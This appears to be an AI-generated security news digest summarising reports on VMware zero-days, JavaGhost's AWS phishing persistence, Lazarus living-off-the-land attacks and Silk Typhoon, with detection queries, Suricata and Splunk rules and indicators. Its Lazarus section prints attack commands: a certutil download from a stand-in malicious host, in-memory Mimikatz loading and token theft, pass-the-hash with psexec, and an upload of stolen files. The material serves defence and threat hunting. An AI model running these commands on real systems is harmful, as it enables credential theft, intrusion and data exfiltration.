The Feed 2025-03-05

alt text

AI Generated Podcast

https://open.spotify.com/episode/27Kpu4MB0AtviKgGKvQ35t?si=H9X_TBpHR2iCImBJ7AnZag

Summarized Sources

  • Broadcom fixes three VMware zero-days exploited in attacks : Broadcom has released patches for three actively exploited zero-day vulnerabilities in multiple VMware ESX products that could allow attackers with administrator or root access in a compromised virtual machine to escape the sandbox and gain access to the hypervisor.
  • JavaGhost’s Persistent Phishing Attacks From the Cloud : The threat actor group JavaGhost has been observed conducting persistent phishing attacks targeting cloud environments, specifically AWS, by leveraging misconfigurations and exposed credentials to send phishing emails and establish long-term persistence.
  • Living off the Land (LOTL) attacks: How North Korea’s Lazarus Group Hackers Exploited Windows : The Lazarus Group, linked to North Korea, conducted Living Off the Land (LOTL) attacks against developers and Web3 organizations by using legitimate Windows tools to install malware, escalate privileges, steal credentials, and exfiltrate data.
  • Silk Typhoon targeting IT supply chain : Microsoft Threat Intelligence has identified the Chinese espionage group Silk Typhoon targeting IT supply chain companies and cloud applications using stolen API keys and compromised credentials to access downstream customers for espionage purposes.
  • Zhong Stealer: Technical Analysis of a Threat Targeting FIntech : A new stealer malware named Zhong Stealer has been identified targeting the cryptocurrency and fintech sectors through social engineering on chat support platforms, enabling data theft and establishing persistence on compromised systems.

Broadcom fixes three VMware zero-days exploited in attacks

Summmary

Broadcom has issued a warning to customers regarding three actively exploited zero-day vulnerabilities (CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226) affecting various VMware ESX products, including ESXi, vSphere, Workstation, Fusion, Cloud Foundation, and Telco Cloud Platform. These vulnerabilities were discovered and reported by the Microsoft Threat Intelligence Center. Successful exploitation by an attacker with privileged administrator or root access within a compromised virtual machine could lead to escaping the virtual machine’s sandbox and gaining access to the hypervisor. Broadcom has evidence suggesting these vulnerabilities have been exploited in the wild, and patches were released on March 4, 2025, to address these issues. The exploitation of these flaws allows attackers to execute code on the host or leak information from the host process. Once the hypervisor is compromised, attackers can access VM data, ESX configurations, and mounted storage, potentially traversing the entire VMware environment. The article emphasizes that patching alone might not be sufficient and recommends conducting a compromise assessment.

Technical Details

The article details three distinct vulnerabilities:

  • CVE-2025-22224: This is a critical heap overflow vulnerability with a CVSS score of 9.3. It is caused by a Time-of-Check Time-of-Use (TOCTOU) issue, leading to an out-of-bounds write. An attacker with local administrative privileges on a virtual machine can exploit this to execute code as the virtual machine executable (VMX) process running on the host. This vulnerability affects VMware ESXi 7.0 and 8.0, VMware Workstation 17.x, VMware Cloud Foundation 4.5.x, and various versions of VMware Telco Cloud Platform and Infrastructure.

  • CVE-2025-22225: This is an arbitrary write vulnerability rated as important with a CVSS score of 8.2. An attacker who has already gained privileges within the VMX process (for example, by exploiting CVE-2025-22224) can leverage this vulnerability to perform an arbitrary kernel write, resulting in a sandbox escape. This vulnerability impacts VMware ESXi 7.0 and 8.0, VMware Cloud Foundation 4.5.x, and various versions of VMware Telco Cloud Platform and Infrastructure.

  • CVE-2025-22226: This is an information disclosure vulnerability rated as important with a CVSS score of 7.1. It stems from an out-of-bounds read in Host Guest File Sharing (HGFS), a VMware feature for file sharing between the guest VM and the host. An attacker with administrative privileges within the virtual machine can exploit this to leak memory from the VMX process. This vulnerability affects VMware ESXi 7.0 and 8.0, VMware Workstation 17.x, VMware Fusion 13.x, VMware Cloud Foundation 4.5.x, and various versions of VMware Telco Cloud Platform and Infrastructure.

The chaining of these vulnerabilities is significant. An attacker might first compromise a guest operating system and gain administrator or root access. Subsequently, they could exploit the critical heap overflow (CVE-2025-22224) to execute code as the VMX process. Following this, the arbitrary write vulnerability (CVE-2025-22225) can be exploited from within the VMX process to achieve a hypervisor escape by writing to the kernel. The information disclosure vulnerability (CVE-2025-22226) can be used by an attacker with administrative privileges on a VM to leak memory from the VMX process.

Once an attacker gains access to the ESX server, they have access to everything on it, including virtual machine data, ESX configuration, and mounted storage. This access to ESX configuration and network storage allows lateral movement within the VMware environment. The article highlights the risk this poses, especially in environments using vMotion, where VMs can move across ESX hosts, giving attackers access to storage of VMs both on the compromised host and others. Furthermore, ESXi’s nature as a “black box” environment lacking traditional EDR tools and monitoring means that a hypervisor escape places the attacker outside of typical security controls, enabling actions like accessing Active Directory databases or deleting data without triggering alerts. This significantly elevates the risk compared to a compromise within a single virtual machine. The impact is also amplified for managed VMware providers and companies with private clouds, as a compromise of one VM could potentially lead to the compromise of every other customer VM or business unit VM respectively.

Industries

The article does not explicitly mention any specific targeted industries, but it highlights the broad impact on organizations using VMware products, including enterprises, managed service providers (SMBs purchasing managed VMs), and companies with private clouds. The mention of Telco Cloud Platform and Infrastructure suggests a potential concern for the telecommunications industry. The reference to ransomware incidents often exploiting ESX or vCenter servers suggests that organizations that rely heavily on virtualized infrastructure are at risk.

Recommendations

The article provides the following recommendations:

  • Patch immediately: Customers who have not applied the updates released on March 4, 2025, are strongly urged to do so for all affected VMware products.
  • Enforce multifactor authentication (MFA) on all accounts: This includes removing users excluded from MFA and strictly requiring it from all devices and locations.
  • Enable passwordless authentication methods: For accounts that support it, use methods like Windows Hello, FIDO keys, or Microsoft Authenticator. For password-requiring accounts, use authenticator apps for MFA.
  • Isolate privileged accounts from productivity accounts: This helps protect administrative access to the environment.
  • Identify and protect critical assets: Focus on ESXi hypervisors by ensuring they have the latest security updates, proper monitoring procedures, and backup and recovery plans.
  • Deploy authenticated scans of network devices using SNMP through Microsoft Defender portal: This can help identify vulnerabilities in network devices like ESXi and provide security recommendations.
  • Turn on attack surface reduction rules: Specifically, enable the rule to “Block abuse of exploited vulnerable signed drivers”. Assess the potential impact of this rule before enabling it in blocking mode.
  • Perform a compromise assessment: Given that these were actively exploited zero-day vulnerabilities, it is crucial to investigate if attackers have already gained a foothold in the environment. This involves checking for signs of intrusion, stolen data, hidden backdoors, or other malicious activities.

Hunting methods

The article mentions using the “Endpoints exposure” tab of the Microsoft Defender for Vulnerability Management report will not surface vulnerable devices for these specific CVEs at the time of the writing. However, it recommends using authenticated scans of network devices using SNMP through the Microsoft Defender portal to identify vulnerabilities in network devices such as ESXi.

The article also emphasizes the need for a compromise assessment to actively search for indicators of compromise, going beyond simply patching. Specific hunting queries or methods are not detailed in the provided excerpts, but the recommendation highlights the importance of proactive threat hunting activities following the disclosure of actively exploited zero-day vulnerabilities.

Original link: https://www.bleepingcomputer.com/news/security/broadcom-fixes-three-vmware-zero-days-exploited-in-attacks/

JavaGhost’s Persistent Phishing Attacks From the Cloud

Summmary

The threat actor group JavaGhost has been active for over five years and has shifted from website defacement to persistent phishing attacks targeting cloud environments, specifically Amazon Web Services (AWS). Between 2022 and 2024, they have been observed leveraging misconfigurations in victim organizations’ AWS environments that expose long-term access keys to initiate phishing campaigns for financial gain. JavaGhost does not exploit AWS vulnerabilities but rather abuses exposed credentials to use services like Amazon Simple Email Service (SES) and WorkMail to send phishing emails and establish long-term persistence within compromised accounts. They have also adopted advanced defense evasion techniques, similar to those used by Scattered Spider, to cover their tracks within CloudTrail logs. Despite their sophistication, all JavaGhost activities leave a detectable logging footprint. Palo Alto Networks customers are better protected through Cortex Cloud and Cortex XSIAM.

Technical Details

JavaGhost gains initial access to AWS environments by obtaining exposed long-term access keys associated with Identity and Access Management (IAM) users. These keys are likely obtained through various exposure methods not detailed in this report. Upon gaining access via the command-line interface (CLI), the threat actors do not make the common GetCallerIdentity API call to evade detection. Instead, their initial API calls include GetServiceQuota, GetSendQuota, and GetAccount to confirm their access and gather information about SES capabilities.

To gain easier visibility and further obfuscate their identity, JavaGhost generates temporary credentials and a console login URL using the compromised long-term access keys. This process involves multiple steps that can be scripted. First, they use the GetFederationToken API within the AWS Security Token Service (STS) to create temporary credentials (sessionID, sessionKey, sessionToken). This API call requires a name for the federated user, a session policy, and a duration. JavaGhost uses an “allow all” inline policy to maximize their permissions, although the effective permissions are capped by the underlying IAM user’s permissions. They opt for GetFederationToken over AssumeRole for generating these temporary credentials.

Next, they generate an encoded URL using the Python urllib3 library. The user agent in CloudTrail logs associated with GetSigninToken events shows Python-urllib/3.10, confirming the use of this library. Finally, a GetSigninToken request is made using the encoded URL to obtain the information needed to create the AWS console login URL for the federated user. This generated URL provides console access for a default of 15 minutes. Unlike sessions created with IAM roles, these federated sessions cannot be easily revoked; an IAM policy must be directly attached to the user to block actions. Attaching the AWS managed AWSDenyAll policy invalidates all permissions for the user but does not terminate an active console session.

To set up their phishing infrastructure, JavaGhost utilizes SES and WorkMail. They begin by creating various SES email identities (both email addresses and domains), which are logged as CreateEmailIdentity events in CloudTrail. They then configure DomainKeys Identified Mail (DKIM) settings, typically during the identity creation process, resulting in PutEmailIdentityDkimAttributes events. The threat actor group also modifies the SES Virtual Delivery Manager (VDM) and Mail-from attributes, generating PutEmailIdentityMailFromAttributes and PutAccountVdmAttributes events.

In addition to SES, JavaGhost configures an AWS WorkMail Organization and adds WorkMail users. Creating a WorkMail Organization (CreateOrganization event) triggers numerous SES and AWS Directory Service (DS) events, including AuthorizeApplication, CreateAlias, and CreateIdentityPoolDirectory if a new WorkMail directory is created. Subsequently, they create WorkMail users (CreateUser event with workmail.amazonaws[.]com as the event source), who are automatically registered to WorkMail (RegisterToWorkMail event).

Before sending phishing emails, JavaGhost creates new SMTP credentials. Notably, they do not change the default username, so all new SMTP usernames start with ses-smtp-user.*. Creating these credentials generates a new IAM user with the SMTP username (which also appears as an access key), and if the AWS account hasn’t used SES historically, a new IAM user group named AWSSESSendingGroupDoNotRename is created with an inline policy allowing only ses:SendRawEmail. These actions are logged as CreateGroup and PutGroupPolicy events. If the group already exists, the new user is simply added to it (AddUserToGroup event).

For long-term persistence, JavaGhost creates various IAM users, some used in attacks and others seemingly left dormant. These unused users serve as backdoors, with access confirmed via console logins but no other immediate actions taken. These IAM users have varied names, some attempting to blend in. All newly created persistent IAM users have the AWS managed AdministratorAccess policy attached, granting them full permissions within the AWS account, as well as console access. These IAM activities are logged as CreateUser, AttachUserPolicy, and CreateLoginProfile events.

In a shift observed in 2024, JavaGhost began using an IAM role to access victim AWS accounts from a threat actor-controlled AWS account. This involves creating a new IAM role with a trust policy that allows access from the attacker’s AWS account (CreateRole event). This new role is also granted unlimited permissions by attaching the AdministratorAccess policy (AttachRolePolicy event). When the attacker assumes this role, it is recorded as two simultaneous CloudTrail events: AssumeRole and SwitchRole.

JavaGhost also leaves a consistent calling card by creating new Amazon EC2 security groups named Java_Ghost with the description “We Are There But Not Visible” (CreateSecurityGroup event). These security groups typically do not contain any security rules or attached resources. This description matches their slogan on a historical website.

Additional suspicious activities include attempting to leave an AWS Organization Unit (LeaveOrganization event), which would remove any Service Control Policies (SCPs) applied at that level. They also enable all AWS regions not enabled by default (EnableRegion event), likely to evade security controls that might be region-specific.

Countries

The article does not explicitly mention any targeted countries. The Indonesian text found on one of their historical websites (“stop blaming everything”) and potentially in resource naming suggests a possible link to Indonesia, but this does not confirm targeting of specific countries.

Industries

The article does not explicitly mention any specific targeted industries, but it indicates that JavaGhost targets cloud environments, specifically organizations using AWS. The nature of phishing attacks suggests a broad targeting scope aiming at unsuspecting individuals within various organizations for financial gain.

Recommendations

The article provides the following recommendations for Palo Alto Networks customers:

  • Limit access to administrative rights.
  • Rotate IAM credentials regularly.
  • Use short term/just-in-time (JIT) access tokens.
  • Enable multi-factor authentication (MFA).
  • Leverage Cloud security posture management (CSPM) capabilities in Cortex Cloud to assist with creating appropriate rules.
  • Contact the Unit 42 Incident Response team if a compromise is suspected.

Hunting methods

The article provides the following Cortex XQL Queries for hunting, investigation, and detection of potentially malicious operations:

  • Authentication: 
    dataset = amazon_aws_raw | filter (eventSource = "sts.amazonaws.com" and eventName = "GetFederationToken") or (eventSource = "signin.amazonaws.com" and eventName = "GetSigninToken")

    dataset = amazon_aws_raw | filter (eventSource = "sts.amazonaws.com" and eventName = "AssumeRole") or (eventSource = "signin.amazonaws.com" and eventName = "SwitchRole")
  • SES: 
    dataset = amazon_aws_raw | filter (eventSource = "ses.amazonaws.com" and eventName = "CreateEmailIdentity") or (eventSource = "iam.amazonaws.com" and eventName in ("CreateUser", "CreateAccessKey", "AddUserToGroup"))
  • WorkMail: 
    dataset = amazon_aws_raw | filter eventSource = "workmail.amazonaws.com" and eventName in ("CreateUser", "CreateOrganization")
  • EC2 Security Group: 
    dataset = amazon_aws_raw | alter groupName = json_extract_scalar(requestParameters, "$.groupName") | alter groupDescription = json_extract_scalar(requestParameters, "$.groupDescription") | filter eventSource = "ec2.amazonaws.com" and eventName = "CreateSecurityGroup" | filter groupName = "Java_Ghost" and groupDescription = "We Are There But Not Visible"

    Palo Alto Networks Cortex Cloud and Cortex XSIAM alert on the following activities:

  • IAM actions such as new user creations, attaching of AdministratorAccess Policy, getfederatedtoken, and getsignintoken.
  • Suspicious sending of emails through Simple Email Service (SES).
  • Use of getgroup and putgroup in CloudTrail.
  • XSIAM also detects behavioral actions from cloud and on-premises endpoints that suggest the collection of AWS IAM credentials.

IOC

User Agents:

aws-cli/1.18.69 Python/3.8.10 Linux/5.4.0-113-generic botocore/1.16.19
aws-cli/1.19.112 Python/2.7.18 Linux/5.4.0-42-generic botocore/1.20.112
aws-cli/1.22.23 Python/3.6.0 Windows/10 botocore/1.23.23
aws-cli/1.22.97 Python/3.6.0 Windows/10 botocore/1.24.42
aws-cli/1.25.62 Python/3.8.13 Linux/5.15.0-46-generic botocore/1.27.61
aws-cli/1.34.14 md/Botocore#1.35.14 ua/2.0 os/windows#10 md/arch#amd64 lang/python#3.10.8 md/pyimpl#CPython cfg/retry-mode#legacy botocore/1.35.14
aws-cli/1.34.28 md/Botocore#1.35.28 ua/2.0 os/linux#5.15.153.1-microsoft-standard-WSL2 md/arch#x86_64 lang/python#3.12.3 md/pyimpl#CPython cfg/retry-mode#legacy botocore/1.35.28
aws-cli/2.13.18 Python/3.11.5 Linux/5.4.0-163-generic exe/x86_64.ubuntu.20 prompt/off command/*
aws-cli/2.17.18 md/awscrt#0.20.11 ua/2.0 os/linux#6.8.0-36-generic md/arch#x86_64 lang/python#3.11.9 md/pyimpl#CPython cfg/retry-mode#standard md/installer#exe md/distrib#ubuntu.24 md/prompt#off md/command#*
aws-cli/2.22.2 md/awscrt#0.22.0 ua/2.0 os/windows#2019Server md/arch#amd64 lang/python#3.12.6 md/pyimpl#CPython cfg/retry-mode#standard md/installer#exe md/prompt#off md/command#*
aws-cli/2.2.16 Python/3.8.8 Linux/3.10.0-1160.31.1.el7.x86_64 exe/x86_64.centos.7 prompt/off command/*
aws-internal/3 aws-sdk-java/1.12.769 Linux/5.10.224-190.876.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/17.0.12+8-LTS java/1.8.0_422 vendor/N/A cfg/retry-mode/standard
aws-internal/3 aws-sdk-java/1.12.769 Linux/5.10.225-191.878.amzn2int.x86_64 OpenJDK_64-Bit_Server_VM/17.0.12+8-LTS java/1.8.0_422 vendor/N/A cfg/retry-mode/standard
Boto3/1.24.61 Python/3.8.10 Linux/5.4.0-42-generic Botocore/1.27.61
Boto3/1.35.28 md/Botocore#1.35.28 ua/2.0 os/linux#5.15.153.1-microsoft-standard-WSL2 md/arch#x86_64 lang/python#3.12.3 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.35.28
Boto3/1.35.3 md/Botocore#1.35.14 ua/2.0 os/windows#10 md/arch#amd64 lang/python#3.10.8 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.35.14
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 OPR/113.0.0.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Python-urllib/3.10

IAM Usernames (for persistence):

adminuserdevs
develops
Gh0st_808
Gh0st_365
rootdev
ses2
warkopi

EC2 Security Group Name:

Java_Ghost

EC2 Security Group Description:

We Are There But Not Visible

IAM User Group Name (default for SES SMTP users):

AWSSESSendingGroupDoNotRename

IP Addresses: The article mentions that Unit 42 has consolidated the IP addresses of the referenced group in their GitHub repository, but the specific IP addresses are not included in the provided excerpts.

Domains and File Hashes: No specific domains or file hashes are mentioned in the provided excerpts.

Original link: https://unit42.paloaltonetworks.com/javaghost-cloud-phishing/

Living off the Land (LOTL) attacks: How North Korea’s Lazarus Group Hackers Exploited Windows

Summary

In November 2024, the Lazarus Group, a North Korean threat actor, conducted Living Off The Land (LOTL) attacks targeting developers and Web3 organizations across Europe. The attack involved the use of trojanized open-source software hosted on GitHub, which, once downloaded and executed, leveraged built-in Windows tools like certutil.exe and mshta.exe to evade traditional cybersecurity defenses. This allowed the attackers to gain unauthorized access, escalate privileges, steal credentials using tools like Mimikatz, and exfiltrate sensitive data, including financial assets and proprietary technologies. The attack aimed to steal financial assets and intellectual property, causing operational disruption to the affected organizations. The primary method relied on stealth, utilizing legitimate Windows utilities and processes, making detection by signature-based antivirus solutions challenging. The attack’s scale was confirmed by security firms in January 2025, highlighting the severe impact once the Lazarus Group established a foothold within the targeted networks.

Technical Details

The Lazarus Group executed this LOTL attack in a multi-stage process, focusing on stealth and the abuse of legitimate system functionalities.

Initial Access: The attack began with the creation of a fake GitHub repository hosting a trojanized version of a popular open-source tool. Developers and Web3 organizations in Europe unknowingly downloaded and installed this infected software due to GitHub being a trusted platform. The initial malware was designed to bypass antivirus detection by masquerading as a legitimate working tool.

Persistence: Once executed, the malware established persistence using built-in Windows utilities:

  • CertUtil Abuse: The legitimate certutil.exe tool, intended for certificate management, was misused to download the next-stage payload from a malicious server. The command certutil -urlcache -split -f http://malicious.com/payload.exe C:\Windows\Temp\payload.exe was executed silently to download and store the subsequent payload without triggering antivirus alerts.
  • Scheduled Tasks and Registry Run Keys: The attackers created background processes that would automatically run malicious scripts at system startup. The schtasks command was used to create a scheduled task disguised as a legitimate Windows Update process: schtasks /create /tn "WindowsUpdate" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\Windows\Temp\payload.ps1" /sc minute /mo 30. This PowerShell command, with the -ExecutionPolicy Bypass parameter, allowed the execution of the malicious payload (payload.ps1) located in the temporary directory every 30 minutes.

Privilege Escalation: After gaining an initial foothold, the attackers aimed to obtain administrator-level control to access more sensitive parts of the system:

  • PowerShell Exploits: PowerShell was used to execute commands without typical security restrictions, likely leveraging known vulnerabilities or misconfigurations.
  • DLL Hijacking: Malicious Dynamic Link Library (DLL) files were used to replace legitimate ones, likely facilitated by PowerShell, allowing the execution of malicious code under the context of trusted processes.
  • Token Manipulation: The attackers employed Mimikatz, a known tool for password theft, to steal security tokens and impersonate administrator users. The command Invoke-Mimikatz -Command ' "privilege::debug" "sekurlsa::tokens" ' run within PowerShell was used to achieve this. The "privilege::debug" command elevates the process privileges, and "sekurlsa::tokens" extracts security tokens from the Local Security Authority Subsystem Service (LSASS) process.

Credential Access: With elevated privileges, the attackers focused on obtaining login credentials for lateral movement:

  • Mimikatz Executed In-Memory: To avoid detection of the mimikatz.exe executable, the attackers downloaded and executed Mimikatz directly from memory using PowerShell. The command Invoke-Expression (IEX (New-Object Net.WebClient).DownloadString("https://github.com/gentilkiwi/mimikatz/raw/master/mimikatz.ps1")) downloads the Mimikatz PowerShell script from a GitHub repository and executes it immediately in memory.
  • Pass-the-Hash Attack: Stolen password hashes were used to authenticate to other machines on the network without needing the actual passwords. The psexec tool was likely used to facilitate this lateral movement with the command format psexec \\victim1-pc -u admin -H aad3b435b51404eeaad3b435b51404ee -c cmd.exe, where -H specifies the NTLM hash.

Data Exfiltration: Once they had control over the network, the attackers exfiltrated sensitive information while attempting to evade detection:

  • Data Compression and Encryption: Files were compressed (using tools like Compress-Archive -Path C:\stolen_data\* -DestinationPath C:\Windows\Temp\file.zip in PowerShell) and likely encrypted to make detection and analysis more difficult during transit.
  • Exfiltration over HTTPS: Stolen files were uploaded to legitimate cloud storage services like OneDrive, disguising the traffic as normal file backups. The PowerShell command Invoke-WebRequest -Uri "https://onedrive.com/upload" -Method POST -InFile "C:\Windows\Temp\file.zip" demonstrates this technique.

The success of these attacks relied heavily on the stealthy nature of LOTL techniques, blending malicious activity with legitimate system processes, which often allowed them to bypass traditional signature-based security solutions like Windows Defender.

Countries

Europe (specifically where the targeted developers and Web3 organizations were located). The C2 servers had a backdoor link to North Korea.

Industries

Developers Web3 organizations

Recommendations

The article provides the following technical recommendations to minimize the risk of LOTL attacks:

  • Monitor Unusual Process Behavior: Implement tools like Sysmon to log detailed process creation events (Event ID 1) and analyze parent-child process relationships to identify suspicious chains (e.g., powershell.exe spawning chrome.exe).
  • Detect Suspicious Network Traffic Using IDS/IPS: Deploy Intrusion Detection and Prevention Systems (IDS/IPS) like Suricata and create rules to flag traffic to known threat actor infrastructure, such as the Lazarus Group’s IP range (e.g., alert ip any any -> [175.45.176.0/22] any (msg:"Suspicious traffic to North Korea - Lazarus group IP"; sid:100001;)).
  • Detect LOTL Attacks Using SIEM Tools: Utilize Security Information and Event Management (SIEM) tools like Splunk to analyze security logs (Windows Event Logs and Sysmon) for suspicious system tool execution and password theft. Example SPL query: index=main source="WinEventLog:*" ( (process_name="*\\mimikatz.exe" AND event_id=10) OR (process_name="*\\regsvr32.exe" OR process_name="*\\rundll32.exe" NOT process_path="C:\\Windows\\System32\\*") ).
  • Configure alerts and automatic response actions in SIEM tools to notify security teams and automatically take actions like disabling affected user accounts or blocking suspicious processes upon detection of malicious activity.
  • Implement the Least Privilege principle: Restrict access to powerful tools like PowerShell and administrative utilities to reduce the attack surface.
  • Implement Network Segmentation: Divide the network into isolated subnets to limit lateral movement of attackers in case of a breach.
  • Deploy Honeypots and Detection Mechanisms: Use fake credentials and systems to lure attackers and detect their presence within the network.
  • Implement Application Whitelisting: Block the execution of unauthorized Living Off The Land Binaries (LOLBins) like rundll32.exe.
  • Maintain Continuous Monitoring and Proactive Detection: Recognize that no security strategy is foolproof against LOTL attacks, and ongoing monitoring and threat hunting are crucial.

Hunting methods

  • Sysmon Analysis:
    • Enable Sysmon with the command: sysmon -accepteula –I.
    • Analyze Event ID 1 (Process Creation) in the Event Viewer (Applications and Services Logs > Microsoft > Windows > Sysmon) for unusual parent-child process relationships, such as powershell.exe spawning command-line interpreters, script hosts, or network-related processes.
  • Suricata Rules:
    • Add the following rule to the Suricata local.rules file: alert ip any any -> [175.45.176.0/22] any (msg:"Suspicious traffic to North Korea - Lazarus group IP"; sid:100001;).
  • Splunk Queries (SPL):
    • Search for Mimikatz execution and system tools running from unusual locations: index=main source="WinEventLog:*" ( (process_name="*\\mimikatz.exe" AND event_id=10) OR (process_name="*\\regsvr32.exe" OR process_name="*\\rundll32.exe" NOT process_path="C:\\Windows\\System32\\*") ).

IOC

IP Addresses:
175.45.176.0/22
Domains:
https://github.com/gentilkiwi/mimikatz/raw/master/mimikatz.ps1
File Paths:
C:\Windows\Temp\payload.exe
C:\Windows\Temp\payload.ps1
C:\stolen_data*
C:\Windows\Temp\file.zip
\mimikatz.exe
*\regsvr32.exe
*\rundll32.exe
C:\Windows\System32\

Original link: https://systemweakness.com/living-off-the-land-lotl-attacks-how-north-korea-lazarus-group-hackers-exploited-windows-a46ee8fb945f

Silk Typhoon targeting IT supply chain

Summary

Microsoft Threat Intelligence has identified a shift in tactics by Silk Typhoon, a Chinese espionage group, now targeting common IT solutions like remote management tools and cloud applications to gain initial access. While they haven’t directly targeted Microsoft cloud services for initial access, they exploit unpatched applications to elevate their access in targeted organizations and conduct further malicious activities. After compromising a victim, Silk Typhoon uses stolen keys and credentials to infiltrate customer networks, where they abuse various deployed applications, including Microsoft services, to achieve their espionage objectives. Silk Typhoon is a well-resourced and technically efficient group known for quickly operationalizing exploits for zero-day vulnerabilities in edge devices and has a large targeting footprint due to their opportunistic exploitation of vulnerable public-facing devices. Since late 2024, they have been observed abusing stolen API keys and credentials from privilege access management (PAM), cloud app providers, and cloud data management companies to access downstream customer environments. They also use password spray and abuse techniques, including leveraging leaked corporate passwords found on public repositories. Silk Typhoon utilizes covert networks consisting of compromised or leased devices to obfuscate their operations and has historically exploited numerous zero-day vulnerabilities in products like Microsoft Exchange, Palo Alto Networks GlobalProtect Gateway, Citrix NetScaler, and Ivanti Pulse Connect VPN. Microsoft has notified affected customers and is publishing this information to raise awareness and provide mitigation guidance.

Technical Details

Silk Typhoon, identified as an espionage-focused Chinese state actor, exhibits technical efficiency and the capability to rapidly integrate exploits for newly discovered zero-day vulnerabilities in edge devices. This threat actor possesses a broad targeting scope, partly attributed to their opportunistic approach of acting on discoveries from vulnerability scanning, swiftly moving to exploitation upon identifying vulnerable public-facing devices.

Initial Access: Silk Typhoon achieves initial access through several methods:

  • Targeting IT supply chain: They target IT providers, identity management, privileged access management, and RMM solutions. Recent activity since late 2024 involved abusing stolen API keys and credentials associated with PAM, cloud app providers, and cloud data management companies to access downstream customer environments.
  • Exploitation of zero-day vulnerabilities: They develop or discover and exploit vulnerabilities in third-party services and software providers. For example, in January 2025, they exploited a zero-day vulnerability in Ivanti Pulse Connect VPN (CVE-2025-0282). Historically, they have exploited zero-day vulnerabilities in GlobalProtect Gateway on Palo Alto Networks firewalls (CVE-2024-3400), Citrix NetScaler ADC and NetScaler Gateways (CVE-2023-3519), and Microsoft Exchange Servers (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).
  • Compromised credentials: They gain initial access through successful password spray attacks and other password abuse techniques, including discovering passwords on public repositories like GitHub.

Once initial access is gained, Silk Typhoon employs various tactics for post-compromise activities:

  • Lateral Movement to Cloud: They move from on-premises to cloud environments by dumping Active Directory, stealing passwords from key vaults, and escalating privileges. They have been observed targeting Microsoft AADConnect (now Entra Connect) servers to escalate privileges and access both on-premises and cloud environments.
  • Maintaining Persistence and Command Execution: Silk Typhoon has used a myriad of web shells since 2020 to execute commands, maintain persistence, and exfiltrate data from victim environments.
  • Manipulating Service Principals/Applications: They abuse service principals and OAuth applications with administrative permissions to perform data exfiltration via MSGraph and Exchange Web Services (EWS). This includes:
    • Gaining access to applications already consented within the tenant to harvest email data.
    • Adding their own passwords to compromised applications.
    • Potentially compromising multi-tenant applications to move across tenants and access additional resources.
    • Creating Entra ID applications disguised as legitimate services or Office 365 themes to facilitate data theft.
  • Data Exfiltration: They exfiltrate data related to China-based interests, US government policy and administration, and legal process and documents related to law enforcement investigations.
  • Obfuscation: They utilize covert networks comprised of compromised Cyberoam appliances, Zyxel routers, and QNAP devices, as well as short-lease VPS infrastructure, to obfuscate their malicious activities.

Observed actions after successful API key theft include reconnaissance and data collection via an admin account, resetting default admin accounts, web shell implants, creation of additional users, and clearing logs.

Countries

United States and throughout the world.

Industries

Information technology (IT) services and infrastructure, remote monitoring and management (RMM) companies, managed service providers (MSPs) and affiliates, healthcare, legal services, higher education, defense, government, non-governmental organizations (NGOs), energy, and others. Victims of downstream activity have been largely in the state and local government, and the IT sector.

Recommendations

Microsoft recommends the following to detect and mitigate Silk Typhoon’s activity:

  • Ensure all public-facing devices are patched, noting that patching does not remediate existing compromises.
  • Validate Ivanti Pulse Connect VPN is patched for CVE-2025-0282 and run the Integrity Checker Tool, considering terminating active sessions after patching.
  • Defend against legitimate application and service principal abuse by establishing strong controls and monitoring. This includes:
    • Auditing the privilege level of all identities (users, service principals, Microsoft Graph Data Connect applications).
    • Scrutinizing privileges of unknown or unused identities and apps with app-only permissions.
    • Identifying and remediating abused OAuth apps using anomaly detection policies and App governance.
    • Reviewing and removing unnecessary applications with EWS.AccessAsUser.All and EWS.full_access_as_app permissions.
    • Implementing granular and scalable access using role-based access control for applications in Exchange Online if mailbox access is required.
    • Monitoring for service principal sign-ins from unusual locations using the risky sign-ins and risky users reports.
  • Defend against credential compromise by building credential hygiene, practicing least privilege, and reducing credential exposure. This includes:
    • Implementing the Azure Security Benchmark and general best practices for securing identity infrastructure.
    • Preventing on-premises service accounts from having direct cloud resource rights.
    • Storing “break glass” account passwords offline and configuring honey-token activity for their usage.
    • Implementing Conditional Access policies enforcing Zero Trust principles.
    • Enabling risk-based user sign-in protection and automating threat response, including MFA for medium-risk sign-ins.
    • Ensuring VPN access is protected using modern authentication methods.
    • Identifying all multi-tenant applications, assessing permissions, and investigating suspicious sign-ins.
  • Inspect log activity related to Entra Connect servers for anomalous activity.
  • Inspect service principals for newly created secrets (credentials) where targeted applications have highly privileged accounts.
  • Identify and analyze any activity related to newly created applications.
  • Identify all multi-tenant applications and scrutinize authentications to them.
  • Analyze any observed activity related to the use of Microsoft Graph or eDiscovery, particularly for SharePoint or email data exfiltration.
  • Look for newly created users on devices impacted by vulnerabilities targeted by Silk Typhoon and investigate VPN logs for evidence of VPN configuration modifications or sign-in activity during the possible window of compromise of unpatched devices.

